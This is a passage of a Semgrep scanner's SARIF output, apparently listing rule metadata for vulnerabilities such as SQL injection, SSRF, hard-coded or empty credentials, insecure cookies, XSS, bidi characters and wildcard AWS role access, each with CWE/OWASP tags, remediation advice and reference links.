vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","id":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","name":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","id":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","name":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mysql.express-mysql-sqli.express-mysql-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"help":{"markdown":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash)\n - [https://cwe.mitre.org/data/definitions/328.html](https://cwe.mitre.org/data/definitions/328.html)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","id":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","name":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express","id":"javascript.express.db.sequelize-express.sequelize-express","name":"javascript.express.db.sequelize-express.sequelize-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sequelize-express.sequelize-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","id":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","name":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"help":{"markdown":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf)\n - [https://www.cvedetails.com/cve/CVE-2020-28168/](https://www.cvedetails.com/cve/CVE-2020-28168/)\n - [https://owasp.org/www-community/attacks/Server_Side_Request_Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)\n","text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"helpUri":"https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","id":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","name":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"help":{"markdown":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash)\n - [https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile](https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile)\n","text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"helpUri":"https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","id":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","name":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","id":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","name":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"help":{"markdown":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted)\n - [https://laravel.com/docs/9.x/responses#cookies-and-encryption](https://laravel.com/docs/9.x/responses#cookies-and-encryption)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management)\n","text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","id":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","name":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","id":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","name":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","id":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","name":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","id":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","name":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"help":{"markdown":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment)\n - [https://cwe.mitre.org/data/definitions/915.html](https://cwe.mitre.org/data/definitions/915.html)\n - [https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md](https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md)\n","text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment","id":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","name":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","MEDIUM CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.audit.mass-assignment.mass-assignment"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","id":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","name":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"help":{"markdown":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href)\n - [https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI](https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI)\n - [https://github.com/pugjs/pug/issues/2952](https://github.com/pugjs/pug/issues/2952)\n","text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","id":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","name":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-href.var-in-href"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"help":{"markdown":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters)\n - [https://trojansource.codes/](https://trojansource.codes/)\n","text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"helpUri":"https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters","id":"generic.unicode.security.bidi.contains-bidirectional-characters","name":"generic.unicode.security.bidi.contains-bidirectional-characters","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.unicode.security.bidi.contains-bidirectional-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"help":{"markdown":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role)\n - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)\n","text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"helpUri":"https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role","id":"json.aws.security.wildcard-assume-role.wildcard-assume-role","name":"json.aws.security.wildcard-assume-role.wildcard-assume-role","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.wildcard-assume-role.wildcard-assume-role"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company 